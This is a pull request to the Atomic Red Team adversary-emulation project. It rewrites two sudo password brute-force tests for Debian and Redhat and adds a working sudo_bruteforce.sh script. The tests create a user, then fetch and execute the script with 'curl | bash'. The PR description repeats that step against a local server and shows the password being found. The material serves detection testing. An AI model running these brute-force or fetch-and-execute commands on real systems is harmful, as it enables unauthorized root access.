### PR TITLE
T1110.001 updated two tests

### DIFF
--- a/atomics/T1110.001/T1110.001.yaml
+++ b/atomics/T1110.001/T1110.001.yaml
@@ -117,76 +117,6 @@ atomic_tests:
       }
       Write-Host "End of bruteforce"
 
-- name: SUDO brute force Debian
-  auto_generated_guid: 464b63e8-bf1f-422e-9e2c-2aa5080b6f9a
-  description: |
-    Attempts to sudo with current user using passwords from a list.  Will run sudo 3 times, each with 3 different password attempts.
-    PreRequisites : debian,ubuntu,kali and pam_tally NOT configured.
-    If the password list contains the user password in last 9 entries, a sudo will be attempted and will succeed if user is in /etc/sudoers.
-    The /var/log/auth.log will show evidence of "3 incorrect password attempts" or "user NOT in sudoers"
-  supported_platforms:
-  - linux
-  dependency_executor_name: sh
-  dependencies:
-  - description: |
-      Check if running on a Debian based machine.
-    prereq_command: |
-      if grep -iq "debian\|ubuntu\|kali" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi
-      if grep -Rq "pam_tally" /etc/pam.d/*; then echo "pam_tally configured"; exit 1; fi
-      cp PathToAtomicsFolder/T1110.001/src/passwords.txt /tmp/workingfile
-      cp PathToAtomicsFolder/T1110.001/src/asker.sh /tmp/asker && chmod 755 /tmp/asker
-      if [ -x "$(command -v sudo)" ]; then echo "sudo installed"; else echo "install sudo"; fi
-    get_prereq_command: |
-      apt-get update && apt-get install -y sudo
-  executor:
-    elevation_required: false
-    command: |
-      for i in 1 2 3 ; do SUDO_ASKPASS=/tmp/asker sudo -k -A whoami && wc -l /tmp/workingfile; done
-      echo done
-    cleanup_command: |
-      rm -f /tmp/asker /tmp/workingfile
-    name: sh
-
-- name: SUDO brute force Redhat
-  auto_generated_guid: b72958a7-53e3-4809-9ee1-58f6ecd99ade
-  description: |
-    Brute force the password of a local user account which is a member of the sudo'ers group on a Redhat based Linux distribution.  
-  supported_platforms:
-  - linux
-  dependency_executor_name: sh
-  dependencies:
-  - description: |
-      Check if running on a Redhat based machine.
-    prereq_command: |
-      if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then echo "Redhat"; else echo "NOT Redhat"; exit 1; fi
-      if grep -Rq "pam_faillock" /etc/pam.d/*; then echo "pam_faillock configured"; exit 1; fi
-      if [ -x "$(command -v sudo)" ]; then echo "sudo installed"; else echo "install sudo"; fi
-      if [ -x "$(command -v openssl)" ]; then echo "openssl installed"; else echo "install openssl"; fi
-    get_prereq_command: |
-      yum -y update && yum install -y openssl sudo
-  executor:
-    elevation_required: true
-    command: |
-      useradd -G wheel -s /bin/bash -p $(openssl passwd -1 password) target
-      su target
-
-      PASSWORDS=(one two three password five); \
-          touch /tmp/file; \
-          for P in ${PASSWORDS[@]}; do \
-              date +"%b %d %T"; \
-              sudo -k && echo "$P" |sudo -S whoami &>/tmp/file; \
-              echo "exit: $?"; \
-              if grep -q "root" /tmp/file; then \
-                  echo "FOUND: sudo => $P"; break; \
-              else \
-                  echo "TRIED: $P"; \
-              fi; \
-              sleep 2; \
-          done; \
-          rm /tmp/file
-    cleanup_command: |
-      userdel target
-    name: sh
 - name: Password Brute User using Kerbrute Tool
   auto_generated_guid: 59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4
   description: |
@@ -222,3 +152,75 @@ atomic_tests:
     command: |
       cd $env:temp
       .\kerbrute.exe bruteuser --dc #{domaincontroller} -d #{domain} $env:temp\bruteuser.txt TestUser1 
+
+- name: SUDO Brute Force - Debian
+  description: |
+    An adversary may find themselves on a box (e.g. via ssh key auth, with no password) with a user that has sudo'ers privileges, but they do not know the users password. Normally, failed attempts to access root will not cause the root account to become locked, to prevent denial-of-service. This functionality enables an attacker to undertake a local brute force password guessing attack without locking out the root user. 
+
+    This test creates the "art" user with a password of "password123", logs in, downloads and executes the sudo_bruteforce.sh which brute force guesses the password, then deletes the user
+  supported_platforms:
+  - linux
+  input_arguments:
+    remote_url:
+      description: url of remote payload
+      type: Url
+      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1110.001/src/sudo_bruteforce.sh
+  dependency_executor_name: bash
+  dependencies:
+  - description: |
+      Check if running on a Debian based machine.
+    prereq_command: |
+      if grep -iq "debian\|ubuntu\|kali\|mint" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi
+      if grep -Rq "pam_tally" /etc/pam.d/*; then echo "pam_tally configured"; exit 1; fi
+      if [ -x "$(command -v openssl)" ]; then echo "openssl is installed"; else echo "openssl is NOT installed"; exit 1; fi
+      if [ -x "$(command -v sudo)" ]; then echo "sudo is installed"; else echo "sudo is NOT installed"; exit 1; fi
+      if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
+    get_prereq_command: |
+      apt update && apt install -y openssl sudo curl
+  executor:
+    name: bash
+    elevation_required: true
+    command: |
+      useradd -G sudo -s /bin/bash -p $(openssl passwd -1 password123) art
+      su art
+      cd /tmp
+      curl -s #{remote_url} |bash
+    cleanup_command: |
+      userdel -fr art
+
+- name: SUDO Brute Force - Redhat
+  description: |
+    An adversary may find themselves on a box (e.g. via ssh key auth, with no password) with a user that has sudo'ers privileges, but they do not know the users password. Normally, failed attempts to access root will not cause the root account to become locked, to prevent denial-of-service. This functionality enables an attacker to undertake a local brute force password guessing attack without locking out the root user. 
+
+    This test creates the "art" user with a password of "password123", logs in, downloads and executes the sudo_bruteforce.sh which brute force guesses the password, then deletes the user
+  supported_platforms:
+  - linux
+  input_arguments:
+    remote_url:
+      description: url of remote payload
+      type: Url
+      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1110.001/src/sudo_bruteforce.sh
+  dependency_executor_name: bash
+  dependencies:
+  - description: |
+      Check if running on a Redhat based machine.
+    prereq_command: |
+      if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then echo "RedHat"; else echo "NOT RedHat"; exit 1; fi
+      if grep -Rq "pam_faillock" /etc/pam.d/*; then echo "pam_faillock configured"; exit 1; fi
+      if [ -x "$(command -v openssl)" ]; then echo "openssl is installed"; else echo "openssl is NOT installed"; exit 1; fi
+      if [ -x "$(command -v sudo)" ]; then echo "sudo is installed"; else echo "sudo is NOT installed"; exit 1; fi
+      if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
+    get_prereq_command: |
+      yum update && yum install -y openssl sudo curl
+  executor:
+    name: bash
+    elevation_required: true
+    command: |
+      useradd -G wheel -s /bin/bash -p $(openssl passwd -1 password123) art
+      su art
+      cd /tmp
+      curl -s #{remote_url} |bash
+    cleanup_command: |
+      userdel -fr art
+
+

--- a/atomics/T1110.001/src/sudo_bruteforce.sh
+++ b/atomics/T1110.001/src/sudo_bruteforce.sh
@@ -1,0 +1,32 @@
+#!/bin/bash
+
+# This script loops through the PASSWORDS array passing each P -> password as
+# --stdin to the "sudo whoami" command, then checks the resulting output for the 
+# username root to discover if the sudo command was passed the correct password 
+# or not. Note: It assumes that the current user is a member of the sudo or 
+# wheel group and can run sudo commands if the correct password is given. 
+
+# Manual testing
+# :~$ P="one"; sudo -k && echo "$P" |sudo -S whoami
+#   [sudo] password for {username}: Sorry, try again.
+#   [sudo] password for {username}: 
+#   sudo: no password was provided
+#   sudo: 1 incorrect password attempt
+# :~$ P="password123"; sudo -k && echo "$P" |sudo -S whoami
+#   [sudo] password for {username}: root
+
+PASSWORDS=(one two three password123 five)
+touch /tmp/temp_file
+for P in ${PASSWORDS[@]}
+do
+    sudo -k && echo "$P" |sudo -S whoami &>/tmp/temp_file
+    if grep --quiet "root" /tmp/temp_file
+    then 
+        echo "$(date +'%Y-%m-%dT%T%Z') exit: $? FOUND: sudo => $P"
+        break
+    else 
+        echo "$(date +'%Y-%m-%dT%T%Z') exit: $? TRIED: $P"
+    fi
+    sleep 2
+done
+rm /tmp/temp_file


### PR DESCRIPTION
**Details:**
I created these two tests on Wed Jan 12 13:12:31 2022, chdd-ltd but they we're not that robust. These are the new and improved versions.

**Testing:**
Tested in VM's and containers: Ubuntu 22.04, ubi8 and rhel 8.7
# server
:~$ docker network create bridge_18
:~$ docker container run -it --rm --network bridge_18 -p 9090:9090 --name python310 python:3.10-bullseye bash
:~$ apt update && apt install -y nano net-tools
:~$ cd /tmp 
:~$ nano sudo_bruteforce.sh # -> Cut&Paste
:~$ python3 -m http.server 9090
# client
:~$ docker container run -it --rm --network bridge_18 --name ubuntu2204 ubuntu:22.04 bash
:~$ apt update && apt install -y openssl sudo curl net-tools
:~$ useradd -G sudo -s /bin/bash -p $(openssl passwd -1 password123) art
:~$ su art
:~$ cd /tmp
:~$ curl -s 172.19.0.3:9090/sudo_bruteforce.sh |bash
    2023-02-13T21:52:08UTC exit: 0 TRIED: one
    2023-02-13T21:52:12UTC exit: 0 TRIED: two
    2023-02-13T21:52:16UTC exit: 0 TRIED: three
    2023-02-13T21:52:18UTC exit: 0 FOUND: sudo => password123
